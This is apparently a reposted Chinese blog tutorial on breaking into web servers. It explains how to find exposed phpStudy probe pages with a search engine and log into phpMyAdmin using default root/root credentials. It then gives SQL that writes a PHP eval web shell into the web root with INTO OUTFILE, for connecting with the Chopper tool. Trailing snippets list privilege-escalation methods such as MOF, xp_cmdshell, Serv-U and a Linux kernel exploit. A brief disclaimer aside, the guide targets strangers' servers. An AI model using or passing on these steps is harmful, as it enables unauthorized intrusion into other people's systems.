利用phpStudy 探针 提权网站服务器

声明:

本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途!


  • 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。
  • 搜索引擎KeyWord:

phpStudy 探针 2014

  • 多往后翻翻。翻个几十页最好。
  • 点开搜索到的内容。

点开搜索到的内容。

翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root):

1、 如果提示正常。请在网页后面加上 ‘phpmyadmin’,如 http://www.baidu.com/phpmyadmin

2、 然后回车即可。

3、 出现以下界面;默认账号密码尝试登陆;

4、 登陆成功后,第一步找到左边导航栏的MYSQL,然后点击上面的SQL,如图

5、 (点击mysql后,右侧表单会增加很多内容,不要理会他,直接点表单上方的SQL按钮即可。)

6、 下面往SQL写入一句话木马,然后用菜刀连接即可!

1、 图片效果不好,贴出代码,自行对比一下子- - 
2、 Code:

mysq1
sql 语句
Drop TABLE IF EXISTS 菜刀连接密码;
Create TABLE 自定义一个表名(cmd text NOT NULL);
Insert INTO 自定义一个表名 (cmd) VALUES(‘<?php @eval($_POST[菜刀连接密码])?>‘);
Select cmd from 自己编写 into outfile ‘D:/WWW/菜刀连接地址.php‘;[‘左边绝对地址需要根据网页自行更改‘]
Drop TABLE IF EXISTS 用户和密码;
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

7、 添加完成后,使用菜刀连接;

后面tmp.php是在写入SQL一句话木马那自定义设置的。

成功连上!可自行提权服务器等操作!

版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/u010984277/article/details/50799537

原文地址:https://www.cnblogs.com/apolloren/p/9193631.html

时间: 2024-10-16 11:56:30

利用phpStudy 探针 提权网站服务器的相关文章

小白日记25:kali渗透测试之提权(五)--利用配置不当提权

利用配置不当提权 与漏洞提权相比,更常见的方法.在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵.当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行提权.如:代码中没有进行参数过滤等操作. 通过查看哪些服务默认以system权限启动,可尝试将其替换或绑定反弹shell程序 了解NTFS权限允许users修改删除本身,则可利用其配置不当,完成提权 XP 安装了其他软件,打开services.msc本地服务设置,查看该软件是否以本地系统权限启动 查

【安全牛学习笔记】利用配置不当提权

┃利用漏洞提权 ┃Ubuntu11.10 ┃http://old-releases.ubuntu.com/releases/11.10/ ┃gcc ┃sudo apt-cdrom add && sudo apt-get install gcc ┃gcc 18411.c -o exp ┃CVE-2012-0056 ┃/proc/pid/mem ┃kernels >=2.6.39 ┃http://blog.zx2c4.com/749 [email protected]:~# search

一次利用MSSQL的SA账户提权获取服务器权限

遇到小人,把服务器整走了 自己手里只有sql server的sa账号密码 模糊记起之前用这个账户提权读取文件的事 百度之,发现相关信息一堆堆 各种工具也用了不少 发现不是语法错误就是权限不够 无奈之下装了sql server r2直接来操作 顺利连接上去,看到有master这个库. 直奔重点去 这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它 尝试用正常的方法打开xp_cmdshell: EX

峰回路转的提权08r2服务器

事前日下这个站的时候说实话,略微的蛋疼.其过程就不写了,就讲讲提权吧.可能图片有点暗.看看我写这篇文章的时候就知道了. 这个学校我好多同学在里面读书,就萌生了.日下这个站的想法. 拿到shell,理所应当的是收集信息了. 2008r2的,哇靠哦.我第一反应就是再看看端口,因为一般08r2的exp能用的不多.先看看有没有waf. 第一个大家并不陌生,360嘛.至于第二个,可能有部分的同学不知道.是一个很出名的远控软件.速度相对比其他的好得多,你懂的.但是呢,有一个exp可以读取其账户资料的.也就是

利用第三方软件—FlashFXP提权

讲师:朽木_soul 提权环境:windows 2003 使用工具:ASP环境.shell一个 提权思路:利用FlashFXP替换文件漏洞,可以读取管理员链接过的站点账号密码. 这是我首发在I春秋的. 1.flash fxp介绍 FlashFXP是一款功能强大的FXP/FTP软件,集成了其它优秀的FTP软件的优点,如CuteFTP的目录比较,支持彩色文字显示;如BpFTP支持多目录选择文件,暂存目录;又如LeapFTP的界面设计. 2.具体过程 下面是我在win03安装的FTP软件,里面什么都没

利用linux漏洞提权

提权就是让普通用户拥有超级用户的权限. 本次试验漏洞适用于RHELt或CenOS系列5~6系列所有版本.主要利用/tmp/目录和/bin/ping命令的权限漏洞进行提权.     试验环境:腾讯云CentOS6.8     内核:2.6.32-642.6.2.el6.x86_64 1.查看系统环境 2.创建普通用户进行权限测试 3.开始提权操作     写一段C语言,用于提权     提权成功 最终执行完命令之后,可以看到执行权限变成了root,提权成功.

mysql常用的提权方法

一,利用MOF提权 Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件. 方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法. 方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件. Microsoft 建议您到存储库编译 MOF 文件使用前两种方法.也就是运行 Mofc

1433提权详细过程解读-中国寒龙

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令.所以这段时间就玩了一下1433错误的恢复和提权.(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1.        无法装载DLL xpsql70.dll或该DLL所引用的某一DLL.原因126(找不到指定模块.)这种情况比较常

windows提权方法总结

windwos提权方法分为两大块: 一.系统漏洞 二.第三方软件漏洞 系统信息泄露和配置不当都可能导致系统被入侵,下面总结是一些常用的windows提权方式. 1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限) 2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接) 3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解) 4,SAM提权(SAM系统帐户,通常需要下载临时